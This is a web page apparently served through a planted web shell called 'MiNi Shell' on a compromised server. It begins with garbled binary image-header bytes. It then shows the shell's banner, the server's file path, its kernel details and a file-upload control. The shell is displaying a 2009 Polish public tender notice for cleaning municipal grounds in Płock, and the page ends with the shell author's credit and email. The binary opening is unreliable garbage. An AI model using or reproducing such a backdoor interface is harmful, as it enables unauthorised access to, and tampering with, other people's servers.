JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090827/296436-N-2009.html

<p class="kh_header"><b>Płock: Utrzymanie porządku i czystości na terenach będących własnością Gminy - Miasto Płock</b><br>
<b>Numer ogłoszenia: 296436 - 2009; data zamieszczenia: 27.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. , ul. Polna 7, 09-400 Płock, woj. mazowieckie, tel. 024 3640310, faks 024 3640311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzgm-plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie porządku i czystości na terenach będących własnością Gminy - Miasto Płock.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia określony według kodów Wspólnego Słownika Zamówień (CPV):
90910000 - 9	- usługi sprzątania
50870000	- usługi w zakresie napraw i konserwacji wyposażenia placów zabaw.
90400000 - 1	- usługi utylizacji nieczystości
90511000 - 2	- usługi wywozu odpadów

Przedmiot zamówienia obejmuje świadczenie usługi w zakresie: 

Utrzymanie porządku i czystości  na terenach będących własnością Gminy - Miasto Płock

I.  Utrzymanie porządku i czystości  na terenach przyległych do budynków:

1.Codzienne sprzątanie chodnika wzdłuż budynku, dojść do budynku i śmietnika oraz innych powierzchni utwardzonych,
2.Opróżnianie koszy osiedlowych (nie dotyczy koszy znajdujących się przy ulicy) za każdym razem, gdy kosze są przepełnione.
3.Wygrabianie suchych liści przy żywopłotach, sukcesywnie wg potrzeb z wywiezieniem i utylizacją.
4.Usuwanie chwastów przy opaskach budynków, sukcesywnie wg potrzeb z wywiezieniem i utylizacją.
5.Usuwanie i wywożenie śmieci oraz zgrabianych jesienią liści z terenów przyległych do budynku oraz wywożenie nieczystości z terenów zewnętrznych - wg terminów wywozu ustalonych przez wykonawcę.
6.Codzienne sprzątanie placów zabaw: usuwanie śmieci, potłuczonego szkła oraz innych przedmiotów zagrażających bezpieczeństwu użytkowników,
7.Sprzątanie terenu w sytuacjach awaryjnych w niedzielę i święta, po otrzymaniu zgłoszenia od administratora,
8.Niezwłoczne usuwanie śniegu w porze zimowej z ciągów komunikacyjnych - chodników, dojść i podestów wejściowych do klatek schodowych, dojść do altan śmietnikowych oraz uliczek osiedlowych. Usuwanie śniegu należy przeprowadzić na całej szerokości ciągów komunikacyjnych. Po większych opadach śniegu powyższe prace należy wykonać z wykorzystaniem sprzętu mechanicznego, dostosowanego do pracy na chodnikach.
9.Zapobieganie skutkom gołoledzi poprzez posypywanie ciągów komunikacyjnych należących do      nieruchomości, zakupionym i dowiezionym na koszt własny piaskiem bądź skuwanie miejsc oblodzonych oraz stałe utrzymywanie drożności odpływu z chodników wody z topniejącego śniegu i lodu,
10.Bieżące powiadamianie Rejonu Obsługi Mieszkańców o stwierdzonych faktach nie wywiązywania się z obowiązków firm zajmujących się wywozem nieczystości stałych,
11.Usługi określone w pkt. 9 i 10 winny być wykonywane w dni powszednie będące dniami roboczymi, lecz w zależności od potrzeb również przez siedem dni w tygodniu, po otrzymaniu zgłoszenia od administratora,
12.Wymiana piasku w  piaskownicach 1 raz w sezonie jesiennym .
zakres prac obejmuje:
a) wybranie starego piasku z piaskownic,
b) wywóz wybranego piasku i złożenie go na odpowiednim składowisku,
c) wykonanie dezynfekcji podłoża piaskownicy,
d) nasypanie nowego piasku (posiadającego Świadectwo Stacji Sanitarni- Epidemiologiczne
    dopuszczające zastosowanie piasku na plac zabaw), do wysokości 2/3 całkowitej wysokości każdej
   piaskownicy wraz z jego plantowaniem,
e) uporządkowanie terenu po wykonanych czynnościach.

II. Współpraca z administracją (z Rejonem Obsługi Mieszkańców) 

1.Przekazanie Zamawiającemu danych kontaktowych Wykonawcy w celu umożliwienia mieszkańcom zgłoszeń w przypadkach nie wywiązywania się z w/w zakresu.

Integralną częścią przedmiotu zamówienia są niżej wymienione dokumenty:
1.Wykaz przydomowych, osiedlowych terenów gminnych - ROM I
2.Wykaz przydomowych, osiedlowych terenów gminnych - ROM III
3.Wykaz chodników przyległych do nieruchomości gminnych - ROM III
4.Wykaz przydomowych, osiedlowych terenów gminnych - ROM IV
5.Wykaz przydomowych, osiedlowych terenów gminnych - ROM V
6.Wykaz chodników przyległych do nieruchomości gminnych - ROM V
7.Wykaz piaskownic znajdujących się na terenie ROM I, ROM III, ROM IV i ROM V.

	Łączna rzeczywista powierzchnia do sprzątania przydomowych, osiedlowych terenów gminnych oraz chodników przyległych do nieruchomości gminnych wynosi: 400 040,62 m2, po przeliczeniu przez współczynniki korygujące  -  168  801,53  m2.
	Łączna ilość piaskownic - szt. 16.    
	Łączna ilość piasku - 70 ton.

Uwaga: powierzchnia skorygowana o współczynniki określone w Załączniku do opisu przedmiotu     zamówienia  jest  podstawą do określenia ceny 1 m2 wskazanego w ofercie.

Zamawiający zastrzega sobie prawo do ograniczenia powierzchni sprzątanej jak też do zmian w Wykazie terenów gminnych poprzez wprowadzenie pozycji zamiennych w szczególności z powodu ograniczenia lub zmian w powierzchni zasobów  przez niego administrowanych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 50.87.00.00-4, 90.40.00.00-1, 90.51.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 4.600,00-  zł (słownie: cztery tysiące sześćset  złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział wykonawcy, którzy spełniają następujące warunki:
1)Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia , w tym:
a)wykonali w ciągu ostatnich trzech lat (przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, tj usługę w zakresie utrzymania porządku i czystości na przydomowych, osiedlowych terenach oraz chodnikach przyległych do nieruchomości, na którą będzie składana przyszła oferta o powierzchni odpowiadającej powierzchni stanowiącej przedmiot zamówienia (powierzchnia wskazana w Załącznikach Nr 5-10 Wykaz przydomowych, osiedlowych terenów gminnych oraz chodników przyległych do nieruchomości oraz o wartości co najmniej: 213.003,00 zł.
wraz z załączonymi referencjami dokumentami potwierdzającymi, że usługa ta została wykonana należycie. 
b) dysponują lub będą dysponować co najmniej 25 osobami zdolnymi do realizacji przedmiotowej usługi.
Zamawiający wymaga dodatkowo, by Wykonawca dysponował 1 osobą  do nadzoru .
W takim przypadku w załączniku  nr 4 Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia Wykonawca winien wpisać dodatkowo 1 osobę nadzorującą. 
3)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
wykażą (przychód) z działalności operacyjnej za okres ostatnich dwóch lat obrotowych, tj. za lata 2007 i 2008, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres nie niższy niż przewidywana wartość wykonywanych usług za każdy rok oddzielnie zaproponowana w formularzu oferty przez Wykonawcę.
4)Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego. 
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia nie spełnia), na podstawie dokumentów wymienionych w pkt. 3 niniejszego rozdziału SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)Formularz oferty - Załącznik Nr1.
b)Oświadczenie wykonawcy, że spełnia wymagania określone w art. 22 ust. 1 Prawo zamówień publicznych oraz nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego - Załącznik Nr 2.
c)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji 
działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d)Aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
e)Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanej, jednej usługi w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, tj, usługę w zakresie utrzymania porządku i czystości  na przydomowych, osiedlowych terenach oraz chodnikach przyległych do nieruchomości, na którą będzie składana oferta oraz o wartości co najmniej:213.003,00.zł i o powierzchni odpowiadającej powierzchniom wskazanych w Załącznikach Nr 5-10 Wykaz przydomowych, osiedlowych terenów gminnych oraz chodników przyległych do nieruchomości gminnych z załączonymi referencjami dokumentami potwierdzającymi, że usługa ta została wykonana należycie - Załącznik Nr 3.
f)Wykaz  co najmniej 25 osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - Załącznik Nr 4.
     Zamawiający wymaga dodatkowo, by Wykonawca dysponował 1 osobą  do nadzoru .
W takim przypadku w Załączniku  Nr 4 Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia Wykonawca winien wpisać dodatkowo 1 osobę nadzorującą. 
g)Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do realizacji przedmiotowej usługi, jeżeli w  Załączniku Nr 4  wskazał osoby, którymi będzie dysponował.
h)Części Sprawozdania finansowego, tj. bilansu oraz rachunku zysków i strat , a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o części badanego sprawozdania, w przypadku Wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za lata 2007 i 2008 , a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
i)Wykaz  części zamówienia, których wykonanie Wykonawca powierza podwykonawcom - Załącznik Nr 12.
W przypadku, gdy Wykonawca nie przewiduje podwykonawców - wpisuje on Nie dotyczy i załącza niewypełny Załącznik Nr 12 do oferty.
j)W przypadku złożenia oferty wspólnej - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wymaga się, aby każdy z Wykonawców występujących wspólnie złożył dokumenty określone w niniejszym punkcie - lit. ( b, c, d )..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzgm-plock.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Polna 7, 09-400 Płock.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2009 godzina 09:30, miejsce: ul. Polna 7, 09-400 Płock, kancelaria POK NR 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com